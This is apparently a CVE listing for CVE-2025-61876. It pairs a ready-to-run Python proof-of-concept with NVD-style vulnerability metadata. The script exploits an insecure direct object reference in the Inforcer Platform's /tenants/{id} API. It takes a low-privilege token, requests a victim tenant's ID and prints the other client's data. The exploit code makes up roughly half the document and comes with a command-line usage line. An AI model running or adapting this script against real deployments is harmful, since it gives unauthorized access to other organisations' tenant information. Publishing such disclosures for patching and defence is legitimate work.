CVE-2025-61876

import requests import sys # CVE-2025-61876 IDOR PoC for Inforcer Platform # Target: /tenants/{id} API endpoint def test_idor(target_url, valid_tenant_id, target_tenant_id, auth_token): """ Test for IDOR vulnerability in Inforcer Platform Args: target_url: Base URL of the target valid_tenant_id: A valid tenant ID you have access to target_tenant_id: A tenant ID you want to access (victim) auth_token: Authentication token for the low-privilege user """ headers = { 'Authorization': f'Bearer {auth_token}', 'Content-Type': 'application/json' } # Legitimate request with own tenant ID legitimate_url = f"{target_url}/tenants/{valid_tenant_id}" resp1 = requests.get(legitimate_url, headers=headers) print(f"[*] Legitimate request to /tenants/{valid_tenant_id}: {resp1.status_code}") # Malicious request - accessing different tenant's data malicious_url = f"{target_url}/tenants/{target_tenant_id}" resp2 = requests.get(malicious_url, headers=headers) print(f"[*] Malicious request to /tenants/{target_tenant_id}: {resp2.status_code}") if resp2.status_code == 200 and resp2.text != resp1.text: print("[!] IDOR VULNERABILITY CONFIRMED!") print(f"[!] Retrieved data from tenant {target_tenant_id}") print(resp2.text) return True return False if __name__ == "__main__": if len(sys.argv) < 5: print("Usage: python cve-2025-61876_poc.py <url> <valid_id> <target_id> <token>") sys.exit(1) target = sys.argv[1] valid_id = sys.argv[2] target_id = sys.argv[3] token = sys.argv[4] test_idor(target, valid_id, target_id, token)

{"cve": {"id": "CVE-2025-61876", "sourceIdentifier": "[email protected]", "published": "2025-10-29T19:15:38.330", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insecure Direct Object Reference (IDOR) in /tenants/{id} API endpoint in Inforcer Platform version 2.0.153 allows an authenticated user with low privileges to enumerate and access tenant information belonging to other clients via modification of the tenant ID in the request URL."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://silvatech.uk/cve-2025-61876-inforcer-platform/", "source": "[email protected]"}, {"url": "https://www.inforcer.com/platform", "source": "[email protected]"}, {"url": "https://silvatech.uk/cve-2025-61876-inforcer-platform/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}